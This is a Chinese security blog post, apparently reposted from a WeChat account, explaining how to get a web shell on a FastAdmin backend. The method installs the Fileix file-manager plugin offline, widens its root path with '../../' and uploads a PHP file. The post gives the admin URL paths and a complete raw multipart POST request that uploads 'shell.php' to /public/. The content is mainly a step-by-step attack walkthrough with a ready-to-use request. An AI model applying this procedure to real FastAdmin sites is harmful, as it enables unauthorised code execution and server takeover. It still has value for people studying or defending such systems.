FastAdmin后台GetShell

admin 2020年6月19日06:45:37评论15 views字数 1648阅读5分29秒阅读模式

 

0x01 前言

FastAdmin是基于ThinkPHP5和Bootstrap的后台框架,可以利用三方插件GetShell

0x02 本地测试

FastAdmin官方源码下载地址:

https://www.fastadmin.net/download.html

开启phpstudy本地搭建

FastAdmin后台GetShell

安装成功,新版源码的后台地址是随机生成的

FastAdmin后台GetShell

后台默认会有插件管理功能,但是绝大部分用户会把这个功能阉割掉

FastAdmin后台GetShell

点进去看到有一堆付费和免费的插件

FastAdmin后台GetShell

翻到了目前已有的三个官方发布的在线文件管理器插件,一个是官方付费版,一个是三方付费版

FastAdmin后台GetShell

FastAdmin后台GetShell

但是由于舍不得花十块钱买插件,所有只能用三方免费版插件,直接点击安装会需要登录账号,登录信息会记录到日志,不便于操作,所以去官方下载离线安装包

FastAdmin后台GetShell

Fileix文件管理器离线安装包官方下载地址:

https://www.fastadmin.net/store/fileix.html

点击离线安装,选择上传你下载的ZIP离线安装包

FastAdmin后台GetShell

插件安装完成会自动启用,默认路径配置是这样的

FastAdmin后台GetShell

然后打开是这样的

FastAdmin后台GetShell

可以修改为 ../../,那么再打开就是这样的

FastAdmin后台GetShell

然后浅显易懂,直接右键上传php文件就能getshell

FastAdmin后台GetShell

上面是本地测试环境,真实环境会出现这样一个问题,就是点击文件管理功能不会显示任何内容

FastAdmin后台GetShell

后来了解一下是因为没有配置前台页面,不太好修改,所以利用下面的方法

0x03 通用方法

1.插件管理地址:

/admin/addon?ref=addtabs

进入后台默认不显示插件管理功能,访问插件管理地址,上传离线安装包

FastAdmin后台GetShell

2.文件管理地址/读取所有文件地址:

/admin/fileix?ref=addtabs/admin/fileix/lst

真实环境中如果出现不显示功能的情况,必要时可以读取所有文件地址

FastAdmin后台GetShell

3.上传poc:

POST /admin/fileix/data?target=%2F HTTP/1.1Host: localhostContent-Length: 1050Origin: http://localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryrZmyeAB3SciJDWSTAccept: */*Referer: http://localhostAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8Cookie: PHPSESSID=xxxxxxxxConnection: close
------WebKitFormBoundaryrZmyeAB3SciJDWSTContent-Disposition: form-data; name="upload"; filename="shell.php"Content-Type: application/octet-stream
code------WebKitFormBoundaryrZmyeAB3SciJDWSTContent-Disposition: form-data; name="action"
upload------WebKitFormBoundaryrZmyeAB3SciJDWSTContent-Disposition: form-data; name="target"
/public/------WebKitFormBoundaryrZmyeAB3SciJDWST--

修改host地址post过去

FastAdmin后台GetShell

利用poc成功上传shell

FastAdmin后台GetShell

FastAdmin后台GetShell
扫码关注最新分享
搜索公众号:nearsec
FastAdmin后台GetShell
你点的每个在看,我都认真当成了喜欢

本文始发于微信公众号(Khan安全攻防实验室):FastAdmin后台GetShell

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2020年6月19日06:45:37
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   FastAdmin后台GetShellhttps://cn-sec.com/archives/535600.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息